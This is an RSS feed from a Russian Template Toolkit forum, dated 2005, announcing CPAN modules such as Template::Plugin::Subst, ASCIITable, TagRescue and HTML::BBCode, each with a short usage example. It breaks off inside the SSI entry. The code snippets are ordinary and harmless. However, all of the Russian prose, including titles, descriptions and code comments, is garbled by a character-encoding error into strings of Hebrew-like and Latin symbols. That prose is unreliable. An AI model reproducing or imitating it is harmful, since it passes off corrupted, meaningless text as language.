¸¬ײבם <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-121.html - Template Toolkit - ¢·¢׀·ײו¨ֶ  ¦׀ ב ¢ײוס ד ץ ¢׀ײװ ׂ· כ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-121.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-115.html?rss - Sun, 6 Nov 2005 08:46:17 GMT - Template::Plugin::Subst - ף ׂ¨װ  ו¨ֶדו  ד ״ײׂײשם ב¨¬ח׀בװסµ כסב י¨װ·½ - http://forum.template-toolkit.ru/view_topic/topic_id-115.html?rss - ױ  CPAN ײ״ח¢׀·ֶײכ װ <a target="_blank" href="http://search.cpan.org/~nikc/Template-Plugin-Subst/">ׂײ¦ח׀ם Template::Plugin::Subst</a>, ֶײוײבס½ ״ײףכײ׀¨ו כס״ײ׀װום ף ׂ¨װס כ ו¨ֶדו¨ ד ·ד״ײ׀םףײכ װ·¨ׂ ב¨¬ח׀בװסµ כסב י¨װ·½.<br /><br />¸ד״ײ׀םףײכ װ·¨ כ·בוח ׀םװײ¬ײ ׂ¨וײ¦  <span style="font-weight:bold">subst</span><br /><div class="code"><pre>[% USE Subst %] -[% str = 'ץ·׀ײ װ  ׂס׀ײ' %] -[% str.subst('(ץ·׀ײ|ׂס׀ײ) װ  (ׂס׀ײ|ץ·׀ײ)', '$2 װ  $1', 1) %]</pre></div><br /><br />¸ד״ײ׀םףײכ װ·¨ ×·׀םוב <br /><div class="code"><pre>[% USE filt = Subst - pattern = '(ץ·׀ײ|ׂס׀ײ) װ  (ׂס׀ײ|ץ·׀ײ)' - replacement = '$2 װ  $1' - global = 1 %] -[% FILTER $filt %] -ץ·׀ײ װ  ׂס׀ײ -[% END %]</pre></div> - - ׁײ¢ װײכ ¸¬ײבם <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-115.html - Template Toolkit - ¢·¢׀·ײו¨ֶ  ¦׀ ב ¢ײוס ד ץ ¢׀ײװ ׂ· כ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-115.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-111.html?rss - Sat, 1 Oct 2005 06:52:16 GMT - Template::Plugin::ASCIITable - כסכײ¦ ו¨ֶדוײכסµ ו ¢׀·₪ - http://forum.template-toolkit.ru/view_topic/topic_id-111.html?rss - ױ  CPAN ײ״ח¢׀·ֶײכ װ  כ¨בד· 0.1 <a target="_blank" href="http://search.cpan.org/~dakkar/Template-Plugin-ASCIITable/">ׂײ¦ח׀ Template::Plugin::ASCIITable</a>, ֶײוײבס½ ״ײףכײ׀¨ו ב·דײכ ום ו¨ֶדוײכס¨ ו ¢׀·₪ס.<br /><br /><div class="code"><pre>[% - USE ASCIITable; - ASCIITable.cols('a', 'b', 'c'); - ASCIITable.rows([1,2,3],['one','two','three']); - ASCIITable.draw() -%]</pre></div><br />לסכײ¦:<br /><br /><div class="code"><pre> -.=----+-----+------=. -| a | b | c | -|=----+-----+------=| -| 1 | 2 | 3 | -| one | two | three | -'=----+-----+------='</pre></div><br /><br />׀ ¬·װ ״ײףכײ׀¨ו װ דוב ·כ ום ״ ב ׂ¨ובס ו ¢׀·₪ס,   ו ֶי¨ דײף¦ כ ום דײ¢דוכ¨װװס¨ דו·׀· ב ׂײֶ. - - ׁײ¢ װײכ ¸¬ײבם <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-111.html - Template Toolkit - ¢·¢׀·ײו¨ֶ  ¦׀ ב ¢ײוס ד ץ ¢׀ײװ ׂ· כ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-111.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-102.html?rss - Thu, 21 Jul 2005 05:47:32 GMT - Template::Plugin::Perl - קֶד״ײבו ב¦  ×חװֶ₪·½ Perl כ ץ ¢׀ײװס - http://forum.template-toolkit.ru/view_topic/topic_id-102.html?rss - ױ  CPAN ײ״ח¢׀·ֶײכ װ <a target="_blank" href="http://search.cpan.org/~agent/Template-Plugin-Perl/">ׂײ¦ח׀ם Template::Plugin::Perl</a>, ״ב¨¦ײדו כ׀ש·½ ב¦ ״ײ׀¨ףװסµ ×חװֶ₪·½ Perl.<br /><br /><div class="code"><pre>[% USE Perl %] -[% Perl.log(100) %] -[% Perl.rand(1) %] -[% Perl.exp(2) %] -[% Perl.sprintf(&quot;%.0f&quot;, 3.5) %] -[% Perl.pow(2, 3) %] # 2 ** 3; -[% Perl.eval('2**3') %] -[% Perl.sin(3.14) %] -[% Perl.cos(0) %] -[% Perl.join(',', 'a', 'b', 'c') %] -[% list = ['a','b','c']; - Perl.join(',' list) %]</pre></div> - - ׁײ¢ װײכ ¸¬ײבם <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-102.html - Template Toolkit - ¢·¢׀·ײו¨ֶ  ¦׀ ב ¢ײוס ד ץ ¢׀ײװ ׂ· כ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-102.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-101.html?rss - Thu, 21 Jul 2005 04:37:32 GMT - Template::Plugin::POSIX - POSIX ×חװֶ₪·· כ ץ ¢׀ײװ µ - http://forum.template-toolkit.ru/view_topic/topic_id-101.html?rss - ױ  CPAN ײ״ח¢׀·ֶײכ װ <a target="_blank" href="http://search.cpan.org/~agent/Template-Plugin-POSIX/">ׂײ¦ח׀ם Template::Plugin::POSIX</a>. ׃ײ¦ח׀ם ״ײףכײ׀¨ו ·ד״ײ׀םףײכ ום כ ץ ¢׀ײװ µ ×חװֶ₪·· POSIX.<br /><br /><div class="code"><pre>[% USE POSIX %] -[% POSIX.log(100) %] -[% POSIX.rand(1) %] -[% POSIX.exp(2) %] -[% POSIX.sprintf(&quot;%.0f&quot;, 3.5) %] -[% POSIX.pow(2, 3) %] -[% POSIX.ceil(3.8) %] -[% POSIX.floor(3.8) %] -[% POSIX.sin(3.14) %] -[% POSIX.cos(0) %]</pre></div> - - ׁײ¢ װײכ ¸¬ײבם <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-101.html - Template Toolkit - ¢·¢׀·ײו¨ֶ  ¦׀ ב ¢ײוס ד ץ ¢׀ײװ ׂ· כ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-101.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-96.html?rss - Mon, 11 Jul 2005 04:05:37 GMT - Template::Plugin::Decode - ״ב¨ײ¢ב ףײכ װ·¨ כסכײ¦  כ Unicode - http://forum.template-toolkit.ru/view_topic/topic_id-96.html?rss - ױ  CPAN ײ״ח¢׀·ֶײכ װ <a target="_blank" href="http://search.cpan.org/~lyokato/Template-Plugin-Decode/">ׂײ¦ח׀ם Template::Plugin::Decode</a>, ֶײוײבס½ ״ב¨¦ײדו כ׀¨ו ד״ײדײ¢ ״ב¨ײ¦ײ׀¨ום ד׀ײיװײדו· ד ·ד״ײ׀םףײכ װ·¨ׂ כ ץ ¢׀ײװ µ UTF-8.<br /><br /><div class="code"><pre>לװ  ׀¨ [% USE Decode %]. -פ ו¨ׂ ׂײיװײ ·ד״ײ׀םףײכ ום ×·׀םוב 'decode'. -רוײו ×·׀םוב ״ב¨ײ¢ב ףח¨ו דובײֶח ·ף UTF-8 כײ כװחוב¨װװ·½ unicode-×ײבׂ ו Perl: -[% multibyte_str | decode %]</pre></div><br />¡כוײב ׂײ¦ח׀ ״ב¨¦׀ ¬ ¨ו ד׀¨¦חש·½ ״ײ¦µײ¦. ל ֶ ¨דוכ¨ ֶײ¦·בײכֶ· ץ ¢׀ײװײכ ·ד״ײ׀םףח¨וד UTF-8. « ½׀ס ¦ײ׀יװס דײ¦¨בי ום BOM-ף ״·דם. לד¨ כµײ¦װס¨ ¦ װװס¨ ¦¨ֶײ¦·בחוד ×·׀םובײׂ decode. - - ׁײ¢ װײכ ¸¬ײבם <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-96.html - Template Toolkit - ¢·¢׀·ײו¨ֶ  ¦׀ ב ¢ײוס ד ץ ¢׀ײװ ׂ· כ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-96.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-94.html?rss - Sat, 2 Jul 2005 06:41:54 GMT - Template::Plugin::XSLT - XSLT-״ב¨ײ¢ב ףײכ װ·¨ XML - http://forum.template-toolkit.ru/view_topic/topic_id-94.html?rss - ױ  CPAN ײ״ח¢׀·ֶײכ װ  כ¨בד· 1.2 <a target="_blank" href="http://search.cpan.org/~scott/Template-Plugin-XSLT/">ׂײ¦ח׀ Template::Plugin::XSLT</a>, כ ֶײוײבײׂ ב¨ ׀·ףײכ װ ×·׀םוב, ״ײףכײ׀ש·½ ״בײ·ףכײ¦·ום XSLT-״ב¨ײ¢ב ףײכ װ· ×ב ¬ׂ¨װו  XML.<br /><br /><div class="code"><pre>[% USE transform = XSLT(&quot;stylesheet.xsl&quot;); %] - ... -[% foo.as_xml | $transform foo = '&quot;bar&quot;' baz = 123 %]</pre></div> - - ׁײ¢ װײכ ¸¬ײבם <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-94.html - Template Toolkit - ¢·¢׀·ײו¨ֶ  ¦׀ ב ¢ײוס ד ץ ¢׀ײװ ׂ· כ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-94.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-88.html?rss - Tue, 24 May 2005 11:28:04 GMT - Template::Plugin::NakedBody - כס¦¨׀¨װ·¨ BODY-דײדו כ׀ש¨½ HTML-¦ײֶחׂ¨װו  - http://forum.template-toolkit.ru/view_topic/topic_id-88.html?rss - ױ  CPAN ײ״ח¢׀·ֶײכ װ  כ¨בד· 0.02 <a target="_blank" href="http://search.cpan.org/~adamk/Template-Plugin-NakedBody/">ׂײ¦ח׀ Template::Plugin::NakedBody</a>. § װװס½ ׂײ¦ח׀ם ב¨ ׀·ףח¨ו ×·׀םוב, ֶײוײבס½ כס¦¨׀¨ו דײ¦¨בי·ׂײ¨ HTML-¦ײֶחׂ¨װו  ׂ¨י¦ח ו¨¬ ׂ· &lt;BODY&gt; · &lt;/BODY&gt;. ַ ֶ װ ״·ד װײ כ ¦ײֶחׂ¨װו ₪·· קוײ ײֶ ףסכ ¨וד ח¦ײ¢װײ ״ב· ב ¢ײו¨ ד ¦·ף ½װ¨ב ׂ·. ב· כֶ׀¨װ·· ״ײ¦¬ײוײכ׀¨װװסµ ·ׂ· ¦ײֶחׂ¨װוײכ װ¨ו װ¨ײ¢µײ¦·ׂײדו· ¦ײ״ײ׀װ·ו¨׀םװײ ב¨¦ ֶו·בײכ ום ¦ײֶחׂ¨װו.<br /><br /><div class="code"><pre># included.html -# ל html-ב¨¦ ֶוײב¨ ח¦ײ¢װײ ב ¢ײו ום ד ״ײ׀װסׂ ¦ײֶחׂ¨װוײׂ -&lt;html&gt; -&lt;head&gt; -&lt;style ...&gt; -&lt;/head&gt; -&lt;body&gt; -וײ¢ס כ·¦¨ום ״ב כ·׀םװײ קוײו ֶײװו¨װו װחיװס ו ¢׀·₪ס דו·׀¨½. -&lt;/body&gt; -&lt;/html&gt; - -# mypage.html -[% USE NakedBody %] -&lt;html&gt; -&lt;head&gt; -&lt;style ...&gt; -&lt;/head&gt; -&lt;body&gt; -ַײװו¨װו ·דµײ¦װײ¬ײ ¦ײֶחׂ¨װו . -פ ו¨ׂ כֶ׀ ¨וד ¦ײֶחׂ¨װו, ״ײ¦¬ײוײכ׀¨װװס½ ¦·ף ½װ¨בײׂ. -[% INCLUDE included.html | NakedBody %] -בײ¦ײ׀י¨װ·¨ ·דµײ¦װײ¬ײ ¦ײֶחׂ¨װו . -&lt;/body&gt; -&lt;/html&gt;</pre></div> - - ׁײ¢ װײכ ¸¬ײבם <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-88.html - Template Toolkit - ¢·¢׀·ײו¨ֶ  ¦׀ ב ¢ײוס ד ץ ¢׀ײװ ׂ· כ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-88.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-87.html?rss - Sat, 21 May 2005 08:04:46 GMT - CGI::Application::Plugin::AnyTemplate - ·װו¨בר½ד ֶ ײדװײכװסׂ ד·דו¨ׂ ׂ ץ ¢׀ײװײכ - http://forum.template-toolkit.ru/view_topic/topic_id-87.html?rss - ױ  CPAN ײ״ח¢׀·ֶײכ װ  <a target="_blank" href="http://backpan.cpan.org/authors/id/M/MG/MGRAHAM/CGI-Application-Plugin-AnyTemplate-0.04.tar.gz">כ¨בד· 0.04 ׂײ¦ח׀ CGI::Application::Plugin::AnyTemplate</a>. § װװס½ ׂײ¦ח׀ם דײ¦¨בי·ו ײ¢ײ¢ש¨װװס½ ·װו¨בר½ד ¦׀ ב ¢ײוס ד ׀¢ײ½ ·ףכ¨דוװײ½ ד·דו¨ׂײ½ ץ ¢׀ײװײכ Perl (כ װ דוײש·½ ׂײׂ¨װו ״ײ¦¦¨בי·כ וד <span style="font-weight:bold">HTML::Template</span>, <span style="font-weight:bold">HTML::Template::Expr</span>, <span style="font-weight:bold">Petal</span> · <span style="font-weight:bold">Template Toolkit</span>) ·ף ״ב·׀ײי¨װ·½, ·ד״ײ׀םףחש·µ כ ֶ ¨דוכ¨ ֶײװובײ׀׀¨ב  CGI::Application. - - ׁײ¢ װײכ ¸¬ײבם <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-87.html - Template Toolkit - ¢·¢׀·ײו¨ֶ  ¦׀ ב ¢ײוס ד ץ ¢׀ײװ ׂ· כ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-87.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-84.html?rss - Sun, 15 May 2005 14:37:34 GMT - Inline::TT - כֶ׀¨װ·¨ ץ ¢׀ײװײכ כ דֶב·״ו - http://forum.template-toolkit.ru/view_topic/topic_id-84.html?rss - ױ  CPAN ײ״ח¢׀·ֶײכ װ  כ¨בד· 0.04 <a target="_blank" href="http://search.cpan.org/~philcrow/Inline-TT/">ׂײ¦ח׀ Inline::TT</a>, ֶײוײבס½ ״ײףכײ׀¨ו כֶ׀ ום ץ ¢׀ײװס כ דֶב·״ו ד דײµב װ¨װ·¨ׂ כײףׂײיװײדו· ֶ¨ץ·בײכ װ· ײוֶײׂ״·׀·בײכ װװסµ ץ ¢׀ײװײכ.<br /><br /><div class="code"><pre> -use Inline TT =&gt; 'DATA'; - -# ·ׂ¨װ  ¢׀ײֶײכ קֶד״ײבו·בחוד ֶ ֶ ×חװֶ₪·· -print hello( { name =&gt; 'Rob' } ), &quot;\n&quot;; -print goodbye( { name =&gt; 'Rob' } ), &quot;\n&quot;; - -__DATA__ -__TT__ -[% BLOCK hello %] -&lt;H1&gt; Hello [% name %], how are you? &lt;/H1&gt; -[% END %] -[% BLOCK goodbye %] -&lt;H1&gt; Goodbye [% name %], have a nice day. &lt;/H1&gt; -[% END %]</pre></div><br /><div class="code"><pre>use Inline TT =&gt; &lt;&lt; EO_TEMPLATE -[% BLOCK hello %] -&lt;H1&gt; Hello [% name %], how are you? &lt;/H1&gt; -[% END %] -[% BLOCK goodbye %] -&lt;H1&gt; Goodbye [% name %], have a nice day. &lt;/H1&gt; -[% END %] -EO_TEMPLATE - -print hello( { name =&gt; 'Rob' } ), &quot;\n&quot;; -print goodbye( { name =&gt; 'Rob' } ), &quot;\n&quot;;</pre></div> - - ׁײ¢ װײכ ¸¬ײבם <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-84.html - Template Toolkit - ¢·¢׀·ײו¨ֶ  ¦׀ ב ¢ײוס ד ץ ¢׀ײװ ׂ· כ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-84.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-81.html?rss - Sat, 7 May 2005 12:41:26 GMT - Template::Plugin::HTML::Prototype - ¬¨װ¨ב ₪· Ajax-ֶײ¦  כ ץ ¢׀ײװ µ - http://forum.template-toolkit.ru/view_topic/topic_id-81.html?rss - ױ  CPAN ײ״ח¢׀·ֶײכ װ  <a target="_blank" href="http://backpan.cpan.org/authors/id/B/BA/BAUERB/Template-Plugin-HTML-Prototype-0.01.tar.gz">כ¨בד· 0.01 ׂײ¦ח׀ Template::Plugin::HTML::Prototype</a>. § װװס½ ׂײ¦ח׀ם ״ב¨¦ײדו כ׀¨ו ·װו¨בר½ד ֶ ׂײ¦ח׀ HTML::Prototype, ֶײוײבס½ דײ¦¨בי·ו ×חװֶ₪·· ¦׀ ¬¨װ¨ב ₪·· ֶײ¦  <a target="_blank" href="http://prototype.conio.net/">Javascript-¢·¢׀·ײו¨ֶ· Prototype</a>. Prototype ·ד״ײ׀םףח¨וד כ  דוװײדו· כ <span style="font-weight:bold">Ruby on Rails</span> · דײ¦¨בי·ו ײ¢¨ֶוװײ-ײב·¨װו·בײכ װװח ב¨ ׀·ף ₪· <span style="font-weight:bold">Ajax</span>.<br /><br /><div class="code"><pre> [% USE proto = HTML::Prototype %] - - [% proto.define_javascript_functions %] - [% proto.form_remote_tag(...) %] - [% proto.link_to_function(...) %] - [% proto.link_to_remote(...) %] - [% proto.observe_field(...) %] - [% proto.observe_form(...) %] - [% proto.periodically_call_remote(...) %] - [% proto.submit_to_remote(...) %]</pre></div> - - ׁײ¢ װײכ ¸¬ײבם <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-81.html - Template Toolkit - ¢·¢׀·ײו¨ֶ  ¦׀ ב ¢ײוס ד ץ ¢׀ײװ ׂ· כ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-81.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-75.html?rss - Tue, 12 Apr 2005 12:23:30 GMT - Template::Multilingual - ״ײ¦¦¨ביֶ  װ¨דֶײ׀םֶ·µ ףסֶײכ כ ץ ¢׀ײװ µ - http://forum.template-toolkit.ru/view_topic/topic_id-75.html?rss - ױ  CPAN ײ״ח¢׀·ֶײכ װ  <a target="_blank" href="http://backpan.cpan.org/authors/id/C/CH/CHOLET/Template-Multilingual-0.02.tar.gz">כ¨בד· 0.02 ׂײ¦ח׀ Template::Multilingual</a>. רוײו ׂײ¦ח׀ם כ׀¨וד ״בײ·ףכײ¦װסׂ ײו Template · ״ב¨¦׀ ¬ ¨ו ב¨ ׀·ף ₪· ״ײ¦¦¨ביֶ· װ¨דֶײ׀םֶ·µ ףסֶײכ כ ץ ¢׀ײװ µ.<br /><br />ַײ¦:<br /><div class="code"><pre>use Template::Multilingual; -my $template = Template::Multilingual-&gt;new(); -$template-&gt;language('en'); -$template-&gt;process('example.ttml');</pre></div><br />צ ¢׀ײװ:<br /><div class="code"><pre> -&lt;t&gt; - &lt;en&gt;Hello!&lt;/en&gt; - &lt;fr&gt;Bonjour!&lt;/fr&gt; - &lt;ru&gt;ב·כ¨ו!&lt;/ru&gt; -&lt;/t&gt;</pre></div> - - ׁײ¢ װײכ ¸¬ײבם <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-75.html - Template Toolkit - ¢·¢׀·ײו¨ֶ  ¦׀ ב ¢ײוס ד ץ ¢׀ײװ ׂ· כ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-75.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-74.html?rss - Mon, 4 Apr 2005 06:03:55 GMT - Template::Plugin::TagRescue - ״׀ ¬·װ ¦׀ כס¦¨׀¨װ· ו¨¬ײכ html ד ·דֶ׀¨װ·¨ׂ - http://forum.template-toolkit.ru/view_topic/topic_id-74.html?rss - ׳״ח¢׀·ֶײכ װ  <a target="_blank" href="http://backpan.cpan.org/authors/id/T/TA/TANIMOTO/Template-Plugin-TagRescue-0.06.tar.gz">כ¨בד· 0.06 ׂײ¦ח׀ Template::Plugin::TagRescue</a>. ׃ײ¦ח׀ם כס¦¨׀¨ו ״ב· כסכײ¦¨ (ו.¨. ף ׂ¨װ¨ו &lt; &gt; &amp; &quot; װ  דײײוכ¨ודכחש·¨ entities) ו¨¬· html ף  ·דֶ׀¨װ·¨ׂ חֶ ף װװסµ.<br /><br /><div class="code"><pre>[% USE TagRescue %] - -[% FILTER html_except_for('b') -%] -&lt;B&gt;ך·בװס½!&lt;/B&gt; and &lt;I&gt;ַחבד·כ!&lt;/I&gt;&lt;BR&gt; -[%- END %] - -# לסכײ¦: -# &lt;B&gt;ך·בװס½!&lt;/B&gt; and &amp;lt;I&amp;gt;Italic!&amp;lt;/I&amp;gt;&amp;lt;BR&amp;gt; - -[% '&lt;B&gt;ך·בװס½!&lt;/B&gt; and &lt;I&gt;ַחבד·כ!&lt;/I&gt;&lt;BR&gt;' | html_except_for('i','br') %] - -# לסכײ¦: -# &amp;lt;B&amp;gt;Bold!&amp;lt;/B&amp;gt; and &lt;I&gt;Italic!&lt;/I&gt;&lt;BR&gt; - -[% taglist = ['b', 'br']; '&lt;B&gt;ך·בװס½!&lt;/B&gt; · &lt;I&gt;ַחבד·כ!&lt;/I&gt;&lt;BR&gt;' | html_except_for(taglist) %] - -# לסכײ¦: -# &lt;B&gt;ך·בװס½!&lt;/B&gt; · &amp;lt;I&amp;gt;ַחבד·כ!&amp;lt;/I&amp;gt;&lt;BR&gt;</pre></div> - - ׁײ¢ װײכ ¸¬ײבם <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-74.html - Template Toolkit - ¢·¢׀·ײו¨ֶ  ¦׀ ב ¢ײוס ד ץ ¢׀ײװ ׂ· כ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-74.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-72.html?rss - Tue, 29 Mar 2005 12:46:04 GMT - Template::Plugin::HTML::BBCode - ״ב¨ײ¢ב ףײכ װ·¨ BBCode כ HTML - http://forum.template-toolkit.ru/view_topic/topic_id-72.html?rss - ױ  CPAN ײ״ח¢׀·ֶײכ װ  <a target="_blank" href="http://backpan.cpan.org/authors/id/L/LI/LIOL/Template-Plugin-HTML-BBCode-0.01.tar.gz">כ¨בד· 0.01 ׂײ¦ח׀ Template::Plugin::HTML::BBCode</a>. ׃ײ¦ח׀ם כ׀¨וד ײ¢¨בוֶײ½ כײֶבח¬ ׂײ¦ח׀ HTML::BBCode · ״ב¨¦ײדו כ׀¨ו ×·׀םוב bbcode, ֶײוײבס½ ף ׂ¨װ¨ו ו¨¬· ב ףׂ¨וֶ· BBCode װ  דײײוכ¨ודכוחש·¨ ו¨¬· HTML.<br /><br /><div class="code"><pre>[%- USE HTML::BBCode -%] -[% FILTER bbcode %] -&#91;b]BBCode&#91;/b] - is simple &#91;i]markup language&#91;/i] used in -&#91;url=http://www.phpbb.com/]phpBB&#91;/url]. -[% END %] - -[%- USE HTML::BBCode( 'bbcode_limited' - allowed_tags = [ 'b', 'i', 'u' ] -) -%] -[% FILTER bbcode_limited %] -&#91;b]BBCode&#91;/b] - is simple &#91;i]markup language&#91;/i] used in -&#91;url=http://www.phpbb.com/]phpBB&#91;/url]. -[% END %]</pre></div> - - ׁײ¢ װײכ ¸¬ײבם <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-72.html - Template Toolkit - ¢·¢׀·ײו¨ֶ  ¦׀ ב ¢ײוס ד ץ ¢׀ײװ ׂ· כ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-72.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-71.html?rss - Sun, 27 Mar 2005 11:07:13 GMT - Template::Plugin::DBM::Deep - ·װו¨בר½ד ֶ pure perl DBM - http://forum.template-toolkit.ru/view_topic/topic_id-71.html?rss - ױ  CPAN ײ״ח¢׀·ֶײכ װ  <a target="_blank" href="http://backpan.cpan.org/authors/id/M/ME/MERLYN/Template-Plugin-DBM-Deep-0.02.tar.gz">כ¨בד· 0.02 ׂײ¦ח׀ Template::Plugin::DBM::Deep</a>. ׃ײ¦ח׀ם ״ב¨¦ײדו כ׀¨ו ·װו¨בר½ד ֶ ׂײ¦ח׀ DBM::Deep.<br /><br /><div class="code"><pre> - [% USE db = DBM.Deep(file = &quot;my.db&quot; locking = 1 autoflush = 1); - db.lock; - db.flintstones = { &quot;flintstone&quot; = [&quot;fred&quot; &quot;wilma&quot;] - &quot;rubble&quot; = [&quot;barney&quot; &quot;betty&quot;] }; - db.castaways = [&quot;gilligan&quot; &quot;skipper&quot; &quot;professor&quot; &quot;and the rest&quot; ]; - db.unlock; - -%] - ... - [% db.flintstones.rubble.0; %] -- barney - [% db.castaways.3; %] -- and the rest -</pre></div> - - ׁײ¢ װײכ ¸¬ײבם <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-71.html - Template Toolkit - ¢·¢׀·ײו¨ֶ  ¦׀ ב ¢ײוס ד ץ ¢׀ײװ ׂ· כ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-71.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-68.html?rss - Mon, 14 Mar 2005 12:35:02 GMT - ExtUtils::ModuleMaker::TT - ״ײ¦¬ײוײכֶ  ׂײ¦ח׀ ֶ ¦·דוב·¢ח₪·· ·ף TT-ץ ¢׀ײװײכ - http://forum.template-toolkit.ru/view_topic/topic_id-68.html?rss - ױ  CPAN ײ״ח¢׀·ֶײכ װ  <a target="_blank" href="http://backpan.cpan.org/authors/id/D/DA/DAGOLDEN/ExtUtils-ModuleMaker-TT-0.74.tar.gz">כ¨בד· 0.74 ׂײ¦ח׀ ExtUtils::ModuleMaker::TT</a>. ׃ײ¦ח׀ם ״ײףכײ׀¨ו דובײ·ום דו װ¦ בוװס¨ × ½׀ס, כµײ¦ש·¨ כ דײדו כ ¦·דוב·¢חו·כ  ׂײ¦ח׀ (README, Changes, Todo, Build.PL, Makefile.PL, Proxy_Makefile.PL, MANIFEST.SKIP, test.t, module.pm), ·ף ץ ¢׀ײװײכ TT. - - ׁײ¢ װײכ ¸¬ײבם <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-68.html - Template Toolkit - ¢·¢׀·ײו¨ֶ  ¦׀ ב ¢ײוס ד ץ ¢׀ײװ ׂ· כ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-68.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-67.html?rss - Mon, 14 Mar 2005 12:21:55 GMT - Template::Plugin::String::Compare - דב כװ¨װ·¨ דובײֶ - http://forum.template-toolkit.ru/view_topic/topic_id-67.html?rss - ױ  CPAN ײ״ח¢׀·ֶײכ װ  <a target="_blank" href="http://backpan.cpan.org/authors/id/T/TA/TANIMOTO/Template-Plugin-String-Compare-0.01.tar.gz">כ¨בד· 0.01 ״׀ ¬·װ  Template::Plugin::String::Compare</a>, ֶײוײבס½ ״ײףכײ׀¨ו דב כװ·כ ום דובײֶ· כ דובײֶײכײׂ ֶײװו¨ֶדו¨.<br /><br /><div class="code"><pre> -[% IF '2005-03-01' &lt; '2005-04-01' %] -ז ֶײ¨ דב כװ¨װ·¨ ״בײכײ¦·וד כ ·ד׀ײכײׂ ֶײװו¨ֶדו¨. -[% END %] - -[% USE String.Compare %] -[% IF String.Compare.new('2005-03-01') &lt; '2005-04-01' %] -רוײ דב כװ¨װ·¨ ״בײ·דµײ¦·ו כ דובײֶײכײׂ ֶײװו¨ֶדו¨. -[% END %] -</pre></div> - - ׁײ¢ װײכ ¸¬ײבם <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-67.html - Template Toolkit - ¢·¢׀·ײו¨ֶ  ¦׀ ב ¢ײוס ד ץ ¢׀ײװ ׂ· כ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-67.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-63.html?rss - Sat, 19 Feb 2005 08:23:15 GMT - הב¨¦  ¦׀ ב ףב ¢ײוֶ· eCommerece ״ב·׀ײי¨װ·½ Handel - http://forum.template-toolkit.ru/view_topic/topic_id-63.html?rss - ױ  CPAN ײ״ח¢׀·ֶײכ װ <a target="_blank" href="http://backpan.cpan.org/authors/id/C/CL/CLACO/Handel-0.04.tar.gz">ׂײ¦ח׀ם Handel (כ¨בד· 0.04)</a>. רוײו ׂײ¦ח׀ם ״ב¨¦ײדו כ׀¨ו דב¨¦ח ¦׀ ב ףב ¢ײוֶ· eCommerece ״ב·׀ײי¨װ·½ ד ״ײ¦¦¨ביֶײ½ AxKit · Template Toolkit. - - ׁײ¢ װײכ ¸¬ײבם <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-63.html - Template Toolkit - ¢·¢׀·ײו¨ֶ  ¦׀ ב ¢ײוס ד ץ ¢׀ײװ ׂ· כ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-63.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-62.html?rss - Thu, 17 Feb 2005 07:27:20 GMT - Template::Plugin::SSI - ·ד״ײ׀םףײכ װ·¨ SSI כ ץ ¢׀ײװ µ - http://forum.template-toolkit.ru/view_topic/topic_id-62.html?rss - ױ  CPAN ײ״ח¢׀·ֶײכ װ  <a target="_blank" href="http://backpan.cpan.org/authors/id/C/CO/COREY/Template-Plugin-SSI-0.11.tar.gz">כ¨בד· 0.11 Template::Plugin::SSI</a>. ׃ײ¦ח׀ם כ׀¨וד ײ¢¨בוֶײ½ כײֶבח¬ CGI::SSI · ״ײףכײ׀¨ו ·ד״ײ׀םףײכ ום כ ץ ¢׀ײװ µ SSI-¦·ב¨ֶו·כס.<br /><br /><div class="code"><pre>[% USE SSI %] - -# כֶ׀¨װ·¨ (virtual) × 